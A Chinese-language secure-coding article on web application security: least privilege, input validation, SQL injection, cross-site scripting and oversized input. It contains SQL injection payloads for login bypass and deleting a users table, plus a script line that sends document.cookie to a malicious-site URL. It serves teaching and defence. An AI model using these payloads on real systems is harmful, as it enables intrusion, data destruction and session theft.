開發(fā)人員必須權(quán)衡好安全和功能之間的關(guān)系，這要看某種攻擊得逞的可能性有多大、這個(gè)系統(tǒng)有多重要。

　　開發(fā)人員可以運(yùn)用諸多基本原則來增強(qiáng)web應(yīng)用程序的安全性。主要有以下三條原則:

　　盡量減小權(quán)限

　　對訪問資源的賬戶進(jìn)行配置時(shí)，始終要把這些賬戶的權(quán)限限制在需要的最小權(quán)限。

　　千萬不要相信用戶的輸入，驗(yàn)證任何輸入的內(nèi)容

　　這對web應(yīng)用程序來說尤為重要。確保應(yīng)用程序并不依賴客戶端的驗(yàn)證。在服務(wù)器上應(yīng)當(dāng)重復(fù)所有的檢查工作，因?yàn)橐菦]有約束條件，比較容易構(gòu)建網(wǎng)頁副本，有可能導(dǎo)致破壞性代碼在運(yùn)行，或者導(dǎo)致引起系統(tǒng)崩潰的拒絕服務(wù)(dos)攻擊。

　　有節(jié)制地使用錯(cuò)誤消息

　　雖然在開發(fā)程序時(shí)，詳細(xì)的錯(cuò)誤消息很有幫助，但它們對惡意用戶來說同樣是寶貴的信息來源。所以指定函數(shù)名這類細(xì)節(jié)沒有太大的意義。這樣的細(xì)節(jié)記錄在另一個(gè)日志中比較好。

　　下面幾個(gè)示例介紹了沒有經(jīng)過驗(yàn)證的用戶輸入如何被壞人利用的具體情況，并且介紹了避免這些問題的建議。

　　sql注入

　　如果允許任意的sql命令執(zhí)行，就會(huì)出現(xiàn)sql注入(sql injection)。當(dāng)sql語句在代碼里面動(dòng)態(tài)構(gòu)建時(shí)，通常會(huì)出現(xiàn)這種情況。

　　以下面用c#編寫的代碼為例，該代碼試圖檢查用戶名/密碼組合是否正確:

　　string username = txtusername.text;

　　string password = txtpassword.text;

　　string sql = "select * from tblusers

　　where username = '"+ username +"'

　　and password = '"+ password + "';";

　　//執(zhí)行sql

　　用戶名和密碼從服務(wù)器端的兩個(gè)文本框獲取,并且sql語句被創(chuàng)建，然后該語句執(zhí)行。如果沒有記錄返回，那么表明用戶輸入的詳細(xì)資料不正確，或者沒有經(jīng)過注冊; 否則用戶可以進(jìn)入到下一個(gè)階段。

　　如果用戶在兩個(gè)文本框里面輸入了joe和mypassword，那么sql語句會(huì)是:

　　select * from tblusers

　　where username = 'joe'

　　and password = 'mypassword';

　　這正是開發(fā)人員的意圖。不過要是用戶往密碼文本框里面輸入: ' or 'a' = 'a，sql就會(huì)是:

　　select * from tblusers

　　where username = 'joe'

　　and password = ''

　　or 'a' = 'a';

　　現(xiàn)在，密碼不重要了，因?yàn)?a'='a'總是正確的。如果用來連接到數(shù)據(jù)庫的賬戶有權(quán)刪除數(shù)據(jù)而不是僅僅有權(quán)讀取數(shù)據(jù)，就會(huì)出現(xiàn)更糟糕的情形。假設(shè)用戶往密碼文本框里面輸入: '; delete from tblusers where 'a' = 'a'。這會(huì)得出以下的語句:

　　select * from tblusers

　　where username = 'joe'

　　and password = '';

　　delete from tblusers

　　where 'a' = 'a';

　　現(xiàn)在，整個(gè)用戶表就會(huì)被清空。

　　防止這類問題主要有兩種辦法。一是，可以使用存儲(chǔ)過程(stored procedure)來執(zhí)行用戶驗(yàn)證步驟。設(shè)置參數(shù)值時(shí)，避免使用單引號等特殊符號，因而不可能為where語句添加額外的斷言(predicate)，也不會(huì)運(yùn)行多個(gè)sql語句。譬如說，可以構(gòu)建像下面這樣的存儲(chǔ)過程，接受兩個(gè)輸入?yún)?shù)后，返回表明用戶是不是合法用戶的第三個(gè)參數(shù):

　　create procedure spcheckuser

　　(

　　@username varchar(20),

　　@password varchar(20),

　　@isvalid bit output

　　)

　　as

　　declare @usercount int

　　select @usercount = count(*)

　　from tblusers

　　where username = @username

　　and password = @password

　　if @usercount = 1

　　set @isvalid = 1

　　else

　　set @isvalid = 0

　　現(xiàn)在，初始代碼經(jīng)改動(dòng)后可以使用存儲(chǔ)過程:

　　sqlcommand sqlcommand =

　　new sqlcommand("spcheckuser");

　　sqlparameter sqlparam =

　　new sqlparameter("@username",

　　sqldbtype.varchar, 20)

　　sqlparam.value = txtusername.text;

　　sqlparam.direction =

　　parameterdirection.input;

　　sqlcommand.parameters.add(sqlparam);

　　sqlparam =

　　new sqlparameter("@password",

　　sqldbtype.varchar, 20)

　　sqlparam.value = txtpassword.text;

　　sqlparam.direction =

　　parameterdirection.input;

　　sqlcommand.parameters.add(sqlparam);

　　sqlparam =

　　new sqlparameter("@isvalid",

　　sqldbtype.bit, 1)

　　sqlparam.direction =

　　parameterdirection.output;

　　sqlcommand.parameters.add(sqlparam);

　　//執(zhí)行命令，并檢索輸出參數(shù)值

　　輸入和輸出參數(shù)使用相關(guān)類型來說明。如今區(qū)別在于，基本的ado.net類會(huì)把字符串' or 'a' = 'a當(dāng)成實(shí)際用戶的密碼來處理，而不是當(dāng)成可執(zhí)行sql來處理。

　　避免這種安全漏洞的第二種辦法(也適用于所有的用戶輸入)就是，確保特殊字符或者字符串被禁用。對sql而言，導(dǎo)致問題的那個(gè)字符就是單引號，所以如果沒法使用存儲(chǔ)過程，那么就把所有單引號變成雙引號，這可以防止有人構(gòu)建額外的sql:

　　string username = txtusername.text;

　　string password = txtpassword.text;

　　username = username.replace("'","''");

　　password = password.replace("'","''");

　　string sql = "select *

　　from tblusers

　　where username = '"+ username +"'

　　and password = '"+ password +"';";

　　//執(zhí)行sql

　　現(xiàn)在，構(gòu)建的sql成為:

　　select *

　　from tblusers

　　where username = 'joe'

　　and password = '''

　　or ''a'' = ''a';

　　這意味著該用戶沒有被識別。

　　跨站腳本

　　跨站腳本(有時(shí)縮寫成xss)允許來自一個(gè)地方的代碼在另一個(gè)網(wǎng)站里面運(yùn)行。正如在大多數(shù)情況下一樣，只要驗(yàn)證用戶輸入的內(nèi)容就可以避免這問題。以接受html格式的帖子的公告牌為例。假定用戶在發(fā)布消息中加入了以下內(nèi)容:

　　hello everyone

　　要是不對腳本塊進(jìn)行任何驗(yàn)證及刪除，這條消息就會(huì)出現(xiàn)，標(biāo)準(zhǔn)的警告信息也會(huì)顯示。假定這個(gè)示例沒有惡意，再考慮下一個(gè)示例:

　　var i = new image();

　　i.src =

　　"http://www.malicioussite.com/save.asp"

　　+ escape(document.cookie);

　　現(xiàn)在，該用戶的cookie會(huì)被傳送到惡意網(wǎng)站，然后記錄在網(wǎng)絡(luò)日志里面。這不是原先需要的操作，可能會(huì)泄露私人信息，或者讓不懷好意的人以合法用戶的身份登錄到公告牌。可以通過采用正則表達(dá)式來搜索及清除像< script>及其內(nèi)容這些元素的辦法來防止這個(gè)問題。

　　數(shù)據(jù)溢出

　　數(shù)據(jù)過多可能會(huì)帶來問題，這有兩個(gè)原因。一是，因?yàn)閼?yīng)用程序往往會(huì)崩潰，譬如說，如果程序試圖把50個(gè)字符寫入到列大小只有40個(gè)字符的數(shù)據(jù)庫表，就會(huì)引起程序崩潰。顯然，良好的錯(cuò)誤捕獲方法應(yīng)當(dāng)可以防止這一問題,但如果用戶輸入的是有效內(nèi)容，而且來自可信用戶，那么這個(gè)問題往往不會(huì)發(fā)生。數(shù)據(jù)過多輕則帶來差勁的用戶體驗(yàn),重則導(dǎo)致嚴(yán)重消耗服務(wù)器資源，要是問題頻頻發(fā)生，還會(huì)導(dǎo)致整個(gè)服務(wù)無法使用。如果輸入內(nèi)容專門旨在導(dǎo)致錯(cuò)誤、機(jī)器過載，這就叫拒絕服務(wù)(dos)攻擊。

　　第二個(gè)問題是緩沖器溢出。有時(shí)候，輸入的數(shù)據(jù)會(huì)溢出旨在存放它的內(nèi)存區(qū)，而成為可執(zhí)行代碼的一部分。只要對輸入到輸入框中的數(shù)據(jù)進(jìn)行精心設(shè)計(jì)，攻擊者就可以在服務(wù)器上執(zhí)行任意代碼。

　　為了避免該問題，不要依靠客戶端技術(shù)，譬如設(shè)置文本框的最大長度屬性。這很容易被跳過。有些瀏覽器(包括ie在內(nèi))允許javascript url。如果網(wǎng)頁的文本框有一個(gè)標(biāo)為txtsurname的id，那么下列代碼拷貝到瀏覽器的地址欄上后，就會(huì)改變最大長度屬性:

　　javascript:document.getelementbyid

　　("txtsurname").maxlength = 1000

　　防止這個(gè)問題的方法仍然是在服務(wù)器上進(jìn)行檢查，看看輸入內(nèi)容是否超過所需長度; 必要的話縮減輸入內(nèi)容。(作者單位系河南省鎮(zhèn)平縣教師進(jìn)修學(xué)校)